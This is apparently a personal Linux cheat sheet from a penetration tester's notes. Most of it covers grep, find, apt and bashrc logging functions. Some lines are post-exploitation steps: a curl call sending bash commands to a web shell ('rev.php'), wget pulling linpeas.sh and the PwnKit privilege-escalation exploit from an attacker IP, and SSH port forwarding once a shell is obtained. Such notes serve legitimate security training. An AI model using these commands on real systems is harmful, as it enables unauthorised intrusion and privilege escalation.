Linux

Download Linux Image

Interactive SSH Prompt

~C
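# opens the ssh> prompt, which can be used for port forwarding (only after obtaining a shell)
# type it at the start of a line (right after pressing Enter); OpenSSH 9.2+ also needs EnableEscapeCommandline=yes on the client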

URL Encode via curl

  • URL Encode the values requested via curl
curl -G http://url/rev.php --data-urlencode "cmd=/bin/bash -c 'whoami'"

Wget

  • Wget multiple files with bash expansions
wget http://10.10.14.29/{linpeas.sh,PwnKit}

Chmod

  • Chmod multiple files
# the files that need chmod +x are linpeas.sh and PwnKit; the glob also matches any other file starting with l or P
chmod +x [lP]*

Grep

  • Exclude lines that match any of several patterns
egrep -v '(str1|str2)'
  • Grep for multiple patterns
grep -EInRi --color=always '(str1|str2)'
  • Keep the grep highlighted color when piping the output
grep --color=always dnoscp whoami.txt | more

Find

  • Exclude specific directories from the find command
find / -writable ! -path '/proc/*' 2>/dev/null
  • Find files with multiple extensions
find . -type f \( -name "*.txt" -o -name "*.xml" \)

fzf

  • Install fzf
sudo apt install fzf
  • Make fzf interpret the colors
grep --color=always dnoscp whoami.txt | fzf --ansi

Files

  • Find where a service's files are located without installing the application
sudo apt install apt-file
apt-file search tomcat # lists every packaged file whose path contains the string tomcat
tomcat-users.xml default location

apt

  • Change the default repository for higher speed
# File: /etc/apt/sources.list
# From: deb http://http.kali.org/kali kali-rolling main contrib non-free
# To: deb http://kali.download/kali kali-rolling main contrib non-free
┌──(dnoscp㉿friday)-[~]
└─$ cat /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
# deb http://http.kali.org/kali kali-rolling main contrib non-free
deb http://kali.download/kali kali-rolling main contrib non-free
# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
  • Check the version of a package installed from apt with apt-cache policy <packageName>
➜ dhanesh's-device apt-cache policy sudo
sudo:
Installed: 1.8.31-1ubuntu1.2
Candidate: 1.8.31-1ubuntu1.2
Version table:
*** 1.8.31-1ubuntu1.2 500
500 http://in.archive.ubuntu.com/ubuntu focal-updates/main amd64 Packages
500 http://security.ubuntu.com/ubuntu focal-security/main amd64 Packages
100 /var/lib/dpkg/status
1.8.31-1ubuntu1 500
500 http://in.archive.ubuntu.com/ubuntu focal/main amd64 Packages
500 http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
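  • Add Kali Linux releases in Ubuntu (might be slow when installing packages, and the stability is unknown)
# trust the Kali archive signing key (apt-key reads the key from stdin with "-" and needs root;
# it is deprecated on newer releases in favour of a keyring referenced with signed-by)
wget -q -O - https://archive.kali.org/archive-key.asc | sudo apt-key add -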
# add the repo
echo "deb http://kali.download/kali kali-rolling main contrib non-free" | sudo tee -a /etc/apt/sources.list
sudo apt update

Log things you have installed

  • Add the following function in the .bashrc file
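# note: this function shadows the coreutils "install" command in the current shell
install(){
    # log the command first, then run the last logged line
    echo "sudo apt install -y $*" | tee -a ~/commands.txt && tail -n 1 ~/commands.txt | bash
}
# OR
install(){
    # installation part
    TOOL="$*"
    INSTALL="sudo apt install -y $TOOL"
    echo "$INSTALL" | bash
    ISTATUS=$?
    # logging part
    mkdir -p ~/commands   # the log directory must exist before appending
    if [ "$ISTATUS" -eq 0 ]; then
        echo "sudo apt install -y $TOOL" >> ~/commands/install.txt
    else
        echo "[-] Installation Error: $TOOL" >> ~/commands/failed.txt
    fi
}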
  • Source the file and install new packages with install <packageName> (install xclip)
  • All the install commands are logged to ~/commands.txt (first version) or ~/commands/install.txt (second version)

Log only commands that executed successfully

  • Add the following in the .bashrc file
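a(){
    cmd="$*"
    echo "$cmd" | bash 2>/dev/null
    status=$?   # exit status of the command that was run
    if [ "$status" -eq 0 ]; then
        echo "$cmd" >> ~/successcommands.txt
    else
        # any non-zero exit status lands here, not only "command not found"
        echo "[+] No command found: $cmd"
    fi
}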
  • Execute commands with a <command> (a whoami)
  • Only commands that exit with a successful status code are logged to the ~/successcommands.txt file

Date

  • Date format with full date and time: date +%F:%T (Mostly used with somecommand | tee $(date +%F:%T).log)